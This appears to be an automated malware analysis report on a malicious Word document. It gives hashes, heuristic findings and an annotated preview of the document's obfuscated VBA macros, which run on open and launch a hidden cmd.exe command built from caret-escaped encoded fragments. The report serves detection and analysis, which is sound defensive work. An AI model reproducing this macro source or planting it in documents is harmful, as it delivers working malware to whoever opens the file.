Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c0ebd31696f006ff…

MALICIOUS

Office (OLE)

91.0 KB Created: 2018-08-31 18:35:00 Authoring application: Microsoft Office Word First seen: 2019-02-10
MD5: 22af18efe4cce65076659d9e9c8b24ca SHA-1: facc7682b8c97aede3c5cdb0c32ee54e88cce82e SHA-256: c0ebd31696f006ffd7c60fe9bd757e80a453b78635b2cd0c5ed7eefb29f07b41
142 Risk Score

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker (such as AutoOpen), but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of legacy Word macro execution surface; on its own it attributes neither a downloader nor a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9919 bytes
SHA-256: 07bf9ab14366eae49c599c8db440990a170ea892c2ba4e7e301934271201f2e3
Preview script
First 1,000 lines of the extracted script
' Module header of the carved macros.bas (olevba output), shown as exported.
' VB_PredeclaredId = True together with VB_Base = "1Normal.ThisDocument" is
' what a Word document (ThisDocument) class module normally carries, so the
' AutoOpen routine below appears to live in the document module itself —
' confirm against the olevba stream listing. The random-looking VB_Name
' matches the naming of every other identifier in this sample and carries
' no meaning of its own.
Attribute VB_Name = "wkmwdMaorjp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' AutoOpen: Word runs this automatically when the document is opened
' (the OLE_VBA_AUTOOPEN finding above). The only statement with an
' observable effect is the Shell call; every "Hour ..." line is filler.
Sub AutoOpen()

' Line-continued "On Error Resume Next": any run-time error — including the
' ones the Hour lines raise over undefined names — is swallowed and
' execution simply continues with the next statement.
On _
Error _
Resume _
Next
   ' Hour() invoked as a statement on arithmetic over never-assigned names;
   ' the result is discarded. Dead code that pads and obfuscates the routine
   ' and gives signature-based scanners nothing stable to match.
   Hour 58522 / sWcFj * 83045 / bcinU
   Hour 98578 / 86103
' Spawns a process from a command line assembled at run time (the
' OLE_VBA_SHELL finding). The arithmetic inside KeyString sums to 67;
' KeyString is expected to yield a single key name for that code, which
' presumably supplies the first character of the command — verify in a
' sandbox. The other operands are functions from the second module (e.g.
' iwrwsfYBzl, SYUmbsQiL below), each returning a caret-padded string
' fragment; names not defined anywhere in the carved source evaluate to
' Empty and add nothing. The second argument, 81 - 81 = 0, is the window
' style, i.e. vbHide: the spawned console is not shown to the user.
Shell KeyString(1 + 10 + 11 + 5 + 40) + twcVIDGlnQ + SmTWqoOHFnjR + iwrwsfYBzl + SYUmbsQiL + NBXuwc + LXvURvBBVC + NZDHBi + idSnmZnRvCQz + mlopMGD, 81 - 81
   ' More filler; nothing after the Shell call has an effect.
   Hour 18580 * wjrTR / PLFaV / SAivwA
   Hour FuvfJS * 78395 * QJCzs / FOdzz
   Hour 32208 * rSNVU * rFJitT * qFiUz
End Sub



' Header of the second module carved from the same VBA project. It holds the
' string-builder functions (iwrwsfYBzl, SYUmbsQiL, ...) whose return values
' AutoOpen concatenates into the Shell command line.
Attribute VB_Name = "GvvbJIJYNc"
' Returns one caret-padded fragment of the command line that AutoOpen passes
' to Shell; it is the fourth operand of that expression. The two operands
' before it (twcVIDGlnQ, SmTWqoOHFnjR) are not defined anywhere in this
' listing, so if they are plain variables they are Empty and this fragment
' directly follows the KeyString(...) character. Takes no parameters.
' Every "Hour ..." statement is filler whose result is discarded.
Function iwrwsfYBzl()

' Line-continued "On Error Resume Next": keeps the filler lines from aborting
' the function when their undefined operands raise run-time errors.
On _
Error _
Resume _
Next
Hour jUPRd * mEMMLb * 5992 / 87621
   Hour tBWWP / UOqNj
   Hour zZqYj / 70895 / 88421 / luARs
' First fragment. Chr(5 + 1 + 0 + 0 + 28) is Chr(34), a double-quote, so the
' pieces read: md /V:^ON/C" ^se^t ^13=... — i.e. the tail of a "cmd /V:ON /C"
' invocation followed by a quoted "set" of an encoded value. The '^'
' characters are cmd.exe escape characters that the interpreter removes
' while parsing, which is presumably why they are sprinkled through every
' fragment: the assembled text does not contain the plain substrings
' "cmd /V:ON" or "set". Detection note: content rules for this sample should
' normalise or strip '^' before matching.
GzmKqp = "md /" + "V:^ON/" + "C" + Chr(5 + 1 + 0 + 0 + 28) + "^se^t" + " " + "^13=A^A" + "C^A" + "gA" + "^" + "AI" + "A^AC^" + "A^" + "gAA^" + "IA^ACAg"
Hour YIKDc / qztZv * 51238 / fidUL
   Hour HwboMp / 61372
   Hour RZjXf / fKAKzZ * 96008 / NmpOPd
' Second through eighth fragments: continuation of the caret-padded encoded
' value, interleaved with more Hour filler. Not decoded in this report.
tifAM = "^A^A^" + "I^A^ACA" + "g^A^" + "AI^A" + "^AC^A" + "g^AAI" + "^A^AC" + "^A^gAQf"
Hour 91236 / XFMzX
   Hour 41178 / 70826 / zwbnYj / jwiZWc
   Hour oRioEw * KCpiB
   Hour wnGvz / XSkwqj
   Hour mZnJZ / rqizmB
tztWdCcv = "^A0^" + "HA" + "7B^A" + "^" + "aAM^G" + "A^0BQY" + "^A^" + "M^G" + "^A9Bw" + "^O^A^s" + "G^AhBQZ"
Hour hYSCll / Mvzbt / rilSv * fEAvW
   Hour 37200 * HlPlk
lkRQkwbVD = "A" + "^I^" + "HA^i^B" + "^" + "wO^AQF^" + "A^p" + "B^gR" + "^AQC" + "^Ag" + "^A^Q^" + "b^A" + "UG^A" + "^0^BQ^S"
Hour 44798 / fUznWM
   Hour qljTp * zzcIr
   Hour wnizE / TFulp / 63841 * vUSZIb
TBswRNfMPzI = "^A^0C" + "^Al^" + "Bwa" + "A" + "8^" + "G" + "^A^2Bg^" + "bAkEA7"
Hour voMDa * 91744 * pVmqLj * fNNlL
   Hour 13931 * vfOFV
ndvKO = "AQK" + "^AQ" + "F" + "^ApBg" + "R^A" + "^QC^A^g" + "^AA" + "L^Ao" + "^G^A^P"
Hour 55940 * YsXYdN
vVcOuBkPu = "B^gQA^" + "QCA^" + "o^AQZA" + "^w" + "^G^A" + "^p^B^" + "gR^A^Q" + "GA^h^Bw" + "^bA^w" + "^" + "GA" + "uB"
Hour hAPwdi / zSOuG
   Hour 33810 * mwBji / qEirc / 14145
   Hour QttjpV * WXsoR * 36985 / bBAJk
aUlEK = "^w" + "dA" + "8" + "G^A^E" + "^Bg^L" + "^A^g"
' Return value: the eight fragments joined in declaration order.
iwrwsfYBzl = GzmKqp + tifAM + tztWdCcv + lkRQkwbVD + TBswRNfMPzI + ndvKO + vVcOuBkPu + aUlEK
   ' Trailing filler; the return value is already set.
   Hour JtJiL / LXzFY * vrQFM * rEpjOw
   Hour hPfKKd * IMLKV
   Hour SuFQG / PqpYXD / 48812 / wWGnwY
   Hour lVVTK / uiFmB / 62666 * KwpLF
End Function
Function SYUmbsQiL()

On _
Error _
Resume _
Next
Hour 31792 / CDrwtN
   Hour aiYIY / QkLHcQ / fSZSi * vEGBb
   Hour XHwTh / JThwur / CIjvFh * udwVd
   Hour lNcfLW * zkobwA * iGEzj * 33279
   Hour jroCo / HiBJl / wXBdjh * tIapiQ
wqjFXV = "^" + "F^A" + "uB^" + "Q" + "^W^A^" + "QCA7^BQ" + "eA" + "^IHA0^" + "B^weA^k"
Hour 56774 / wwbMn
   Hour NMLiz / IBGmd * dZDLJQ * azMFQ
   Hour RiRdW / TUOoz
bAECUzjSs = "CA^3BQ" + "^W^A" + "IHA^" + "kA^" + "A^"
Hour 78645 / VTbLn
   Hour 83501 / msPbpC
ajOJtjwQq = "I^A4^G^" + "A^pB^" + "AI^Ao^G" + "^APB^g" + "^Q^AQC" + "^Ao^AA" + "aA" + "^MG^Ah^" + "BQ^ZA" + "IH" + "^AvBg" + "^Z^A^s^"
Hour 20151 * 79821
   Hour isuPJE * oEEBH * 90484 * ZXBjmL
   Hour furMO / WiXqi
   Hour ChSYQ / jkuCN
wHKqO = "DAnA^" + "Q^ZAg" + "^" + "H" + "^" + "A" + "^l^BgL" + "^AcC" + "^A" + "r^" + "AAc"
Hour 70715 / wubdC
   Hour XjVSq * zloXF / JwtSL / dJUXHv
   Hour rojGLf / XihHEo / 63825 * bafQPO
PozUi = "^Ac^H" + "A^MBA^J" + "AsCAn^A" + "^" + "A^X^A" + "cC^Ar" + "^"
Hour 49169 / MVJEhM / 50558 / lULKH
ztFjtaW = "A^wY" + "^" + "AkGAs" + "B" + "^g" + "Y^AU" + "HA^" + "wB" + "^gOAY^H"
Hour twciO * zDHHQ
dmFCnoLCENp = "Au^B^QZ" + "^A" + "QC" + "A9^A^A" + "VA" + "^k^"
Hour dJhPc / kWtTq
   Hour 55230 * ZOqpf / JDwua / VGwZvW
IsRmiubVK = "G^A^G" + "^B" + "AJA^" + "s^D^A" + "nAQ^OAc" + "DAn^A" + "^AI^" + "A0^DA" + "^g^AAc^" + "Ac^H^A^" + "M^B^AJ" + "A^s"
Hour qMjXl / Mvinzo / FJsbD / UzwFQ
   Hour Cdrdkf * DIoUn * 55818 / tQbYFL
   Hour 80618 / wuAvk
   Hour 38429 / bwHHRP
   Hour 25427 * pjqiaT
jGIXlzVSkvB = "DA" 
... (truncated)